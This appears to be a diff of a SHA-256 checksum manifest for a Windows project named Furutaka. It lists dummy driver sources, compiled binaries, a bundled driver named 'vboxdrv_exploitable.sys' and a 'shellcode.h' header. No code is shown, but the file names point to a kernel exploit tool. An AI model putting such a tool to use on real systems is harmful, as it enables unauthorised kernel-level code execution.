c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys
4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys
48820631b430a40f296b17280bc18736f8ac428514ffd931b4b529dc5cc04136 *Compiled\Furutaka.exe
9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln
01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj
2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user
da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln
2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj
f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user
a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c
cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h
10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln
746efc13f8d0f96856876e4027a6c7d1f28f2791173c492ef185a436fd464bf6 *Source\Furutaka\cui.c
3a5e784c79832cd497782267212edf8118431a38e16c11f890e413a12e3cb68c *Source\Furutaka\cui.h
cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys
01e8b1256c0ea978f3f100602732e1314a5108a2aa4563f1d4c98e0d5faebb85 *Source\Furutaka\Furutaka.sln
c7eaba7f4bb49fceac5c13d1a2abd23782c14c167ea6c57a7f65407cd7034149 *Source\Furutaka\Furutaka.vcxproj
e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c
6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h
24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln
16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj
b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters
2b04b5603a1ad01bf21aadb13539b7de81e4a6c414b187c4a021dc8356da3e37 *Source\Furutaka\Furutaka.vcxproj.user
1f1f6d73a914729da08ad347c3bdb7d031c51a354339d0a26b72efcb799dfde1 *Source\Furutaka\global.h
c90a5fa589457ed25641ec8bd7da6b3be603ad5001fa9c4c8c378a47068737d2 *Source\Furutaka\instdrv.c
964d46b2540f1e91797750eb1f2b9c4c0f037792c2066d653727e223222b6208 *Source\Furutaka\instdrv.h
8f309aca118c967f283db492cfda3493bded9dbafebf580a4b5ce8bfd22ce318 *Source\Furutaka\main.c
b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user
1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h
94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c
33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h
c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c
8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f *Source\Furutaka\resource.rc
f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h
fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c
059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h
12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h
cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Furutaka\minirtl\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Furutaka\minirtl\cmdline.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Furutaka\minirtl\minirtl.h
@ -38,10 +45,3 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Furutak
27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\Furutaka\minirtl\_strend.c
60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\Furutaka\minirtl\_strlen.c
87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Furutaka\minirtl\_strncmpi.c
8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
8a28b38ff5a64f0d2a52c019ce8a77ed1f098cfa499c2f27208b0621690022fc *Source\Furutaka\resource.rc
a12de2f7e249ea16519644494c7724e8d5aee23e3744a98019cf9821f054db75 *Source\Furutaka\shellcode.h
2978d95a800f049956b0e3ef53d398003d94e051a463e79796aff4247959e93e *Source\Furutaka\sup.c
d131357000587b1c25adb90dece9558afc38c4fbe77d04e8acb3e6c84a5e2fd1 *Source\Furutaka\sup.h
12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h